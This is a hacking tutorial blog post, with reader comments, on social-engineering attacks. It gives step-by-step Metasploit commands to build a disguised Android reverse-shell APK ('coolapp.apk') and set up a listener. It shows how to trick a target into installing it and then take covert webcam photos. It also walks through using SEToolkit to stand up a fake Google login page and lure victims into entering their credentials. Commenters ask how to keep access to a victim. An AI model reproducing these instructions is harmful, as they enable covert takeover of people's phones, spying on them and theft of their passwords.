Today I am going to teach the various ways that you can use social engineering to hack a system. For those of you that have followed my past tutorials, you know that social engineering can unlock a world of possibilities. This is because no matter how many firewalls, no matter how many patches there are on a server, the password is kept in the minds of people...and people, are not as smart as computers.
Step 1: Understanding How Social Engineering Works
As I say in all of my social engineering tutorials, the secret is simple. Convincing the other person that you have more power than them. Convincing the other person that they should trust you with their private information. This can be accomplished by pretending to be someone you're not.
Social Engineering has existed as far back as the first cavemen. It has been demonstrated through history in famous wars, like the trojan horse, which is now I popular name for a virus. In the next step we are going to look at the different ways we can get information from people.
Step 2: Gathering Info
The goal of any social engineering attack should be to grant you access to information that would otherwise be unauthorized. Below is a list of ways we can get information from a target:
- Convince the target to download a virus
Convincing a target to download a virus would give us access to their entire machine. From their we could turn on their webcam, look at their messages, turn on a key logger, and much more. However, this method has a few flaws. If the target finds out the virus, we could be in big trouble.
- Convincing the target to login to a false website (phishing)
Convincing the target to login to a false website, also known as "phishing", is an easy way to get a target's password. The hardest part of this method is convincing the target to login. Unlike downloading an app, a target is most likely going to see that the url is not the same as the regular url, and refuse to login. There are ways around this however. Altering the target's host file could allow us to swap websites. For instance, when the target goes to www.facebook.com, it would redirect to www.evilwebsite.com. The problem with altering the host file is that we need physical access to the machine.
- Convincing the target that we are their boss
This method is typically used for companies. I dove into deep detail with this method in my past tutorial of "How To Use Social Engineering to Find Out More Information About A Company". This method involves calling the target, and convincing them that we are the Corporate Office. If you are convincing enough, you can tell them to do ANYTHING. It's pretty funny actually.
In the next few steps we will dive into further detail with phishing and viruses. We will be using Kali Linux for the next part but if you don't have Kali Linux, make sure you have Metasploit and the Social Engineering Toolkit.
Step 3: Viruses
Now is where we get technical. For the sake of this tutorial we will be making a simple virus to deploy on our target's android phone. We will assume that you are on the same network as the target, and if you are not, you should check out another tutorial for port forwarding.
First let's start the Metasploit services. To do this, simply type:
service postgresql start
And the second command is:
service metasploit start
Once the services are running, we can start building our exploit. Let's first make the payload. We will have a payload for android that will open a meterpreter session connecting to our computer through port 8080. To do this, type:
msfpayload android/meterpreter/reverse_tcp LHOST=(your ip address) LPORT=8080 R > /root/Desktop/coolapp.apk
Now we should have a payload on the desktop called "coolapp.apk". Now we need to setup a handler to open the meterpreter session in our terminal. To do this we need to open the Metasploit console. Do this by typing:
msfconsole
Wait until the console opens. When the console opens, type the following in the order that I type them:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost (your ip address)
set lport 8080
Once you have typed all these commands in this order, you should be ready to exploit. Now the rest is social engineering. Tell your target that you have found a really cool app that will show a picture of a customized diamond if you answer enough cool questions. Make something up, have a little fun. Once you convince them to download your app, send them the coolapp.apk that you created on the desktop. Do not close the terminal yet. When they have the app and are ready to open it, type:
exploit
This should now open a listener and when the target opens the file, you should have a meterpreter session open. From here you can type the following commands:
webcam_list
This command will give you a little list of the webcams in numeric order.
webcam_snap (number)
This command will take a picture on the target's webcam. For android if you put the number as 1, it will take a picture on the back facing camera and if you put the number as 2, it will take a picture on the front facing camera.
help
This will display more commands and what they will do. For the sake of this tutorial I will let you explore the rest on your own.
In the next step we will discuss phishing with the Social Engineering Toolkit.
Step 4: Phishing
Phishing with Kali Linux is much easier to set up. For simplicity, we will create a google phishing page that our target will connect to, and enter their credentials. First let's open our terminal, and type:
setoolkit
This command will open the window for Social Engineering Toolkit.
The way Social Engineering Toolkit is setup allows us to type a number to proceed to the next step. The numbers that we will be typing, in this order are:
1, 2, 3, 1
Now it should ask you what ip you are using. This should be your local IP. To find this, open a new terminal, and type:
ifconfig
This should display your ip address. Copy this address and paste it back in SEToolkit and hit enter. Now it will ask you what template you are choosing. Choose 2 for google and hit enter. Now it should all start up and run. If it says some stuff about apache, hit control c and edit the config file so apache is turned off. Now convince your target to log in to your local ip address either by shortening the url with a google url shortener, or just telling him or her that your super duper awesome website uses google to connect people.
Step 5: Conclusion
So you have learned about social engineering and how it relates to computers. From here I hope you raise your guard to people who offer you websites and apps and make sure you never ever download anything from a source you can't verify. Thanks and as always comment if you have any concerns! :D
Just updated your iPhone? You'll find new emoji, enhanced security, podcast transcripts, Apple Cash virtual numbers, and other useful features. There are even new additions hidden within Safari. Find out what's new and changed on your iPhone with the iOS 17.4 update.
12 Comments
You need to stop... Im learning to much! :D
Haha! Information overload!
There is no patch for human nature.
ghost_
Indeed
Everytime i try to log into metasploit i get this "The PostgresQL server FAILed to start. Please check the log output..... failed!" but when i check my log outputther are no numbers at all. Help please
Try apt-get update && apt-get upgrade
DOPE!!!
Thank you so much! :)
Hi, I downloaded Python 27, and pycrypto for that version, and also Metasploit but this is wwhat I get upon trying to start the toolkit, anyone could help me please ?
(I should ponit out that I barely know anything about programming, trying to launch toolkit is my first insight into coding, programming etc. So I apologise if the mistake is painfully obvious :))
! Metasploit payloads are not currently supported. This is coming soon.
! Metasploit path not found. These payloads will be disabled.
! Please configure Metasploit's path in the /etc/setoolkit/set.config file.
New set.config.py file generated on: 2016-09-13 17:10:40.250000
Verifying configuration update...
Update verified, config timestamp is: 2016-09-13 17:10:40.250000
Traceback (most recent call last):
File "setoolkit", line 157, in <module>
with open(os.path.join(core.setdir, "/set.options"), "w") as filewrite:
IOError: Errno 13 Permission denied: '/set.options'
Looks like you don't have permissions to work on those files.
hack human always easyer than hack computer
AWESOME AS ALWAYS..
my question is tho, how can i benefit from the payload that i sent them on a different day for example?
like do i have to keep that terminal window open always to profit from the payload the next day?
thank you in advance people ;)
Share Your Thoughts